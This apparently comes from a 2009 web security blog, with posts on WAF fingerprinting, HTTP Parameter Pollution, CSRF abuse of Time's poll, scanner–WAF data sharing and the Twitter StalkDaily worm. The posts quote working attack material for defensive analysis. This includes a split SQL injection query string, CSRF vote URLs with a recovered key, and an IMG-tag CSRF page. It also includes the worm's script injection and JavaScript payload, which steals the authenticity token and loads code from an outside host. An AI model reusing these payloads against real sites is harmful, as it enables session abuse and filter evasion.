The authors even created a tool called wafw00f to help automate these fingerprinting tasks. The tool states that it is able to identify over 20 different WAFs (including ModSecurity) so I thought I would try it out against my own ModSecurity install to see how it works. After reviewing the python source code and running a few tests, it is evident that in order for wafw00f to identify a ModSecurity installation, it is relying upon the Pre Built-In Rules category as mentioned above. Specifically, if a ModSecurity installation is using the Core Rule Set and has the SecRuleEngine On directive set, then the OS command/file access attack payloads sent by wafw00f will trigger the corresponding rules and a 501 response status code will be returned.

Reliance upon the returned HTTP status code is not a strong indicator of the existence of a WAF as this can be easily changed. Looking on the other end of the spectrum, and taking a defensive posture, this scenario reminds me somewhat of best practice steps for virtual patch creation. One of the key tenants for creating these patches is that you don't want to key off of attributes in an attack payload that are superfluous. The point being is that there are only a small set of key elements that are key to the success of the exploit. These are the items that you want to focus on for a virtual patch. If, however, you key off of non-essential data from some proof of concept code, your virtual patch can be easily evaded if the attack alters this data. In this particular case with wafw00f, the HTTP response code generated by ModSecurity is customizable by the polices so the identification effectiveness is reduced to only "Default Configurations." With ModSecurity, for instance, it is trivial to update the status action of the Core Rule Set to use some other status code. This can be accomplished in a number of ways such as by using the block action in the rules or SecRuleUpdateActionById directive to change what status code is returned.

This is an interesting tool in that it aids with the pentesting/assessment steps of footprinting the target network. The more details that you can identify about the target, the more finely tuned your attack strategy can be. With this in mind, if you want to easily trick wafw00f, you could always update the SecServerSignature ModSecurity directive to spoof the server response header and impersonate another WAF product :) Take a look at the wafw00f code for hints on what data to use.

Wednesday, May 27, 2009

HTTP Parameter Pollution

Submitted by Ryan Barnett 05/27/2009

How does your web application respond if it receives multiple parameters all with the same name?

If you don't know the answer to this question, you might want to find out quickly. While not a completely new attack category, webapp security researchers Stefano di Paola and Luca Carettoni certainly opened many people's eyes to the dangers of HTTP Parameter Pollution at the recent OWASP AppSec Europe conference. This was the main premise of the talk and it is actually pretty straight forward - an attacker may submit additional parameters to a web application and if these parameters have the same name as an existing parameter, the web application may react in one of the following ways -

It may only take the data from the first parameter
It may take the data from the last parameter
It may take the data from all parameters and concatenate them together

The ramifications of these processing differences is that attackers may be able to distribute attack payloads across multiple parameters to evade signature-based filters. For example, the following SQL Injection attack should be caught by most negative security filters -

/index.aspx?page=select 1,2,3 from table where id=1

If, however, the attacker passes 2 parameters each called "page" with a portion of the attack payload in each, then the back-end web application may consolidate the payloads together into one on the back-end for processing -

/index.aspx?page=select 1&page=2,3 from table where id=1

If a negative security filter is applying a regex that looks for say a SELECT followed by a FROM to each individual parameter value then it would miss this attack. It is for this reason that some implementations will actually apply the signature check to the entire QUERY_STRING and REQUEST_BODY data strings in order to catch these types of attacks. While this may help, the unfortunate side effect is that this will most likely increase the false positive rate of other signatures.

The best approach to this issue is to use automated learning/profiling of the web application to identify if multiple occurrences of parameters is normal or not. Most web application firewalls, for instance, gather basic meta-data characteristics of parameters such as the normal size of the payloads or the expected character sets used (digits only vs. alphanumeric, etc...). The top tier WAFs, however, also track if there are multiple occurrences. If an attacker then adds in duplicate parameter names, the WAF would be able to flag this anomaly and take appropriate action.

Wednesday, May 13, 2009

Lessons Learned from Time's Most Influencial Poll Abuse: Part 1

Submitted by Ryan Barnett 5/13/2009

In a text book case of web applications being abused due to insufficient anti-automation defenses, the Time Magazine's Internet poll of the most influential 100 people was bombarded with various methods to manipulate the results. The WASC Web Hacking Incident Database provides a great overview of the various tactics that Moot supporters used to influence the poll results. In this installment, we are going to focus on the CSRF attack vectors employed by Moot's supporters.

Cross-site Request Forgery (CSRF) attacks

The supporters of Moot did some analysis and identified a voting URL that the flash application submitted its data to -

http://www.timepolls.com/contentpolls/Vote.do?pollName=time100_2009&id=1883924&rating=1

They then created an auto-voting application to act as a man-in-the-middle interface to the Time poll. The auto-voter URL looked like this -

http://fun.qinip.com/gen.php?id=1883924&rating=1&amount=1

The arguments specified the ID of the person on the poll, what rating or place out of 100 the voter wanted them in and how many votes they were submitting. With this information, the attackers could abuse the amount argument to vote more than one time:

http://fun.qinip.com/gen.php?id=1883924&rating=1&amount=200

When accessing this URL, the application responds with the following message:

Down voting : 1883924 to 1 % influence 200 times per page load.

As you can see, each time this URL was accessed, it was equivalent to 200 individual normal requests.

They decided to use this URL in an automated CSRF campaign by submitting this data as a hidden SPAM link across hundreds of thousands of sites. The end result would be that when clients accessed the pages with this SPAM link on it, it would force the client to submit the Time poll CSRF data behind the scenes. The clients were therefore unknowingly voting for Moot.

Lessons Learned - Implement a CSRF Token

Time eventually identified the manipulations and attempted to implement an authentication token in the URL. The token was an MD5 hash of the URL + Salt value. While a first glance at this may seem like an improvement, it fact it didn't provide much protection. The salt value was embedded inside of the flash voting application and Moot's supporters were able to extract out the value and calculate the proper MD5 key value. They were then quickly able to update their CSRF URLs to include the appropriate data -

http://www.timepolls.com/hppolls/votejson.do?callback=processPoll

&id=335&choice=1&key=a4f7d95082b03e99586729c5de257e7b

Lessons Learned - Implement a *good* CSRF Token

When implementing a CSRF token, it is important to make the value unique for each individual user so that I can not be reused or easily guessable. In this case, the key token value was only factoring in the URL and the salt so the resulting hash would be the same for all users.

There were a few other very interesting aspects to these Time poll attacks and I will cover them in future blog posts.

Identifying CSRF Attack Payloads Embedded in IMG Tags

One of the URLs used by the Moot supporters in their SPAM URL posting campaign is here -

http://fun.qinip.com/

If you inspect the source of the page, you will see the following -

<html>

<head>

</head>

<body>

<img src="http://www.timepolls.com/hppolls/votejson.do?callback=processPoll&id=335&choice=1&key=a4f7d95082b03e99586729c5de257e7b" /><img src="http://www.timepolls.com/hppolls/votejson.do?callback=processPoll&id=335&choice=1&key=a4f7d95082b03e99586729c5de257e7b" />
...

</body>
	</html>

This technique of CSRF uses the IMG html tag to trick the browser into submitting the attack payload. What is interesting with the technique, from a detection perpsective, is that when some browsers make this request, the Accept Request Header tells the web server that is excpecting an image file. For example, FireFox sends this request -

GET /hppolls/votejson.do?callback=processPoll&id=335&choice=1&key=a4f7d95082b03e99586729c5de257e7b HTTP/1.1

Host: www.timepolls.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10

Accept: image/png,image/*;q=0.8,*/*;q=0.5

Accept-Language: en-us,en;q=0.5

Accept-Encoding: gzip,deflate

Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7

Keep-Alive: 300

Connection: keep-alive

Referer: http://fun.qinip.com/

This information could be used in an anomaly scoring scenario to help to identify these types of basic CSRF injections. Proper acknowledgement of identifying this phenomenon goes to Rsnake as we discussed this concept at a previous SANS conference. These types of detection "golden nuggets" are part of Rsnake's upcoming security book entitled "Detecting Malice" which is scheduled for release later this summer by FeistyDuck publishing (www.feistyduck.com).

Tuesday, May 5, 2009

Newebappitis

Submitted by Ryan Barnett 05/05/2009

The webappsec space has been often compared to the early years of the automobile industry. This was the time before safety mechanisms such as seatbelts, airbags, etc... were mandated by governing bodies. Experts rightfully point out that today's web applications are much like the cars of yester-year in that the focus is on features and not on the safety of the users. While I could go on and on with many comparative aspects between the auto industry and webappsec, I want to focus this blog post on one point in particular. The interesting phenomenon called Newcaritis. Take a look at the advertisement by Porsche. for the Boxster. The text box reads:

“Newcaritis”. That’s a technical term for the unanticipated problems that show up in early production cars. No matter how large the automaker, how vaunted its reputation, how extensive its pre-production testing program or how clever it’s engineering staff, there’s nothing like putting several thousand cars in the devilish little hands of the public to uncover bugs that the engineers never dreamed of.

For those of you who have been in charge of either assessing or protecting production web applications, this definition must sound very familiar. It seems as though newly developed and deployed web applications suffer from Newebappitis! The issues are the same - even though organizations attempt to run thorough testing phases, there is just no practical way to duplicate all of the possible ways in which real clients will interact with it once it is in production. The point is that you must have mechanisms in place to identify if/when your clients and web application are acting abnormally. Web application firewalls excel at detecting when clients are submitting data that is outside the expected profile and when web applications respond in an abnormal manner such as returning detailed error messages.

Monday, April 27, 2009

Scanner and WAF Data Sharing

Submitted by Ryan Barnett 04/27/2009

The concept of a web application vulnerability scanner exporting data that is then imported into a web application firewall (WAF) for targeted remediation is not new. In a previous post, I outlined one example of this VA -> WAF data sharing concept where the Whitehat Sentinel service will auto-generate ModSecurity virtual patching rules for specific identified issues. While this concept is certainly attractive to show risk reduction, it is important to realize that you are not constrained to a "one way" data flow. WAFs have access to a tremendous amount of information that it can share with vulnerability scanners in order to make them more effective. VA + WAF should ideally be a symbiotic relationship. Here are a few examples:

When to scan?
Have you ever asked a vulnerability scanning team what their rationale was for their scanning schedule? If not, you might want to do this as the responses may be either illuminating or absolutely frustrating. Unfortunately, most scanning schedules are driven by arbitrary dates to meet minimum requirements (such as quarterly scanning which is mandated by some parent organization). Most scanning is scheduled when it is convenient for the scanning team and is not tailored around any actually intelligence about the target application. Ideally, scanning schedules should be driven around the organizations Change Control processes.

The issue seems to be that most scanning initially leverages the change control process when it is run as a security gate for production when an application is initially being deployed. Then, for some reason, it is set as some arbitrary "time interval" moving forward (once per week, etc...). This scanning is conducted whether or not anything has actually changed within the application. Why is this happening? When discussing this issue with scanning personnel, the overwhelming response is that they scan at set intervals due to a lack of visibility of knowing when an application has actually changed. There is no coordination between the InfoSec/Ops teams to initiate scanning processes when the app changes so they are left with scanning at short intervals in order to be safe.

So, knowing "when to scan" is important. A WAF has a unique positional view of the web application as it is up 24x7 monitoring the traffic. This is in contrast to scanners who take snapshot views of the application when they run. Top tier WAFs are able to profile the web application and identify when the application legitimately changes. In these scenarios, it is a simple matter of setting the appropriate policy actions in order to send out emails to notify the vulnerability scanning staff to immediately initiate a new scan.

What to scan?
It is a somewhat similar scenario to the one mentioned above. Try asking the vulnerability scanning team about their rationale for how they choose "what" to scan. Again, the overwhelming response to this is that they enumerate and scan everything because they have no insight into what has changed in the target application. Understand that there may be reasons for scanning even when the application hasn't changed (such as when a new vulnerability identification check has been created) however this tactic normally results in needless scanning of resources that have not changed.

Similar to the capability outlined in the previous section, not only can a good WAF alert you when an application has changed, but it can also outline exactly which resources have changed. Imagine for a moment that you are in charge of running the scanning processes and if you were able to get an email as soon as a new web resource was deployed or updated and it would outline exactly which resources needed to be scanned. That would result in not only shortening the time to identify a vuln, but it would also significantly reduce the overall scanning time resulting in a more targeted scan.

Scanning Coverage
Another challenge for scanning tools is that of application coverage. Here is another question to ask your vulnerability scanning team - What percentage of the web application do you enumerate during your scans? Answering this question is tricky as it is extremely difficult to accurately gauge a percentage given scanning challenges and the dynamic nature of web applications. The bottom line is that if the scanner can not effectively spider/crawl/index all of the resources, then it obviously can't then conduct vulnerability analysis on it.

The issue of application coverage is another area where WAFs can help scanners. Top WAFs are able to export their learned SITE tree so that they may be used by scanning teams to reconcile the resources. This results not only in greater coverage, but once again, can reduce the overall scanning processes as the crawling phase may be significantly reduced and in some cases excluded all together.

Data sharing between vulnerability scanners and web application firewalls is vitally important for web application remediation efforts. Hopefully this post has helped to demonstrate how the information passing between then tools/processes is not just one-way but is bi-directional. Each one has its own unique perspective on the target application and can provided data to the other that they couldn't necessarily obtain on their own. I believe that the integration of VA+WAF is only going to increase as we move forward.

Monday, April 13, 2009

Twitter Worm - Cross-site Request Forgery Attacks

Submitted by Ryan Barnett 04/13/2009

In case you were too busy hunting for Easter Eggs this past week-end, you may have missed the fact that Twitter was hit with Cross-site Request Forgery worm attacks. Many news outlets are labeling these as Cross-site Scripting Attacks, which is true, however Cross-site Request Forgery is more accurate. Let's look at these definitions:

Cross-site Scripting "occurs whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content. XSS allows attackers to execute script in the victim's browser which can hijack user sessions, deface web sites, possibly introduce worms, etc." This definition does hold true for the Twitter worms as the malicious payload was sent to user's browsers and it would execute.

Cross-site Request Forgery "attack forces a logged-on victim's browser to send a pre-authenticated request to a vulnerable web application, which then forces the victim's browser to perform a hostile action to the benefit of the attacker. CSRF can be as powerful as the web application that it attacks." This definition is more accurate as the malicious javascript payload is forcing a logged in Twitter user to update their profile to include the worm javascript. The fact that the javascript code is leveraging the user's session token data to send an unintential request back to the application is the essence of a CSRF attack.

In my previous post I mentioned how it was difficult to neatly place attacks into just one category. Was this an XSS attack or a CSRF attack? In actuality it was both. These worm attacks leveraged a lack of proper output encoding to launch an XSS attack, however the payload itself was CSRF.

The attacks targeted Twitter user's "profile" component and injected javascript similar to the following:

<a href="http://www.stalkdaily.com"/><script src="hxxp://mikeyylolz.uuuq.com/x.js">

The "<script>" data is what was getting injected into people’s profiles. Taking a quick look at the "x.js" script, we see the following:

var update = urlencode("Hey everyone, join www.StalkDaily.com. It’s a site like Twitter but with pictures, videos, and so much more! :)");var xss = urlencode(’http://www.stalkdaily.com"></a><script src="http://mikeyylolz.uuuq.com/x.js"></script><script src="http://mikeyylolz.uuuq.com/x.js"></script><a ‘);
var ajaxConn = new XHConn();ajaxConn.connect("/status/update", "POST", "authenticity_token="+authtoken+"&status="+update+"&tab=home&update=update");ajaxConn1.connect("/account/settings", "POST", "authenticity_token="+authtoken+"&user[url]="+xss+"&tab=home&update=update");

The CSRF code is using an AJAX call to stealthily send the request to Twitter without the user's knowledge. It is issuing a POST command to the "/status/update" page with the appropriate parameter data to modify the "user[url]" data. Also important to note - Twitter was using a CSRF token (called authenticity_token) to help prevent these types of attacks. This is the perfect example of why, if your web application has XSS vulnerabilities, that the use of a CSRF token is useless for local attacks. As you can see in the payload above, the XSS AJAX code is simply scraping the authenticity_token data from within the browser and sending it with the attack payload.

The Cortesi blog has an excellent technical write-up of what is happening -

What’s happening here is that it looks like somebody realized they could save url encoded data to the profile URL field that would not be properly escaped when re-displayed. This is particularly nasty because you could get infected simply by viewing somebody’s profile page on Twitter that was already infected. If you visited an infected profile, the JavaScript in the profile would execute and by doing so tweet the mis-leading link, and update your profile with the same malicious JavaScript thereby infecting anybody that then visits your profile on twitter.com.

Defenses/Mitigations - Users
Use the NoScript plugin for Firefox as it will allow you to pick and choose when/where/what javascript you want to allow to run.

Defenses/Mitigations - Web Apps
Disallowing clients from submitting any html code is manageable, however you still need to be able to canonicalize the data before applying any your filters. If done properly, you can simply look for html/scripting tags and data and disallow it entirely. What is challenging is when you have allow your clients to submit html code, however you want to disallow malicious code. Wiki sites, blogs and social media sites such as Twitter have to allow their clients some ability to upload html data. For situation such as this, an applications such as the OWASP AntiSamy package or HTMLPurifier are excellent choices.

Although allowing some level of basic html code changing is understandable, adding in scripting code is different. One aspect of monitoring that can be done (by a web application firewall) is to monitor and track the use of scripting code per resource. By tracking this type of meta-data, you could identify if *any* scripting code is suddenly appearing on a page (when previously there was none) or if there are, say 2 "<script>" tags on a page and now there are 3. This would indicate some sort of an application change. Once alerted to this, the next question is - Was this a legitimate change or something malicious? If Twitter had been using this type of monitoring, they would have been alerted as soon as "Victim Zero" (in this case - the worm originator) altered his profile URL with the encoded Javascript data.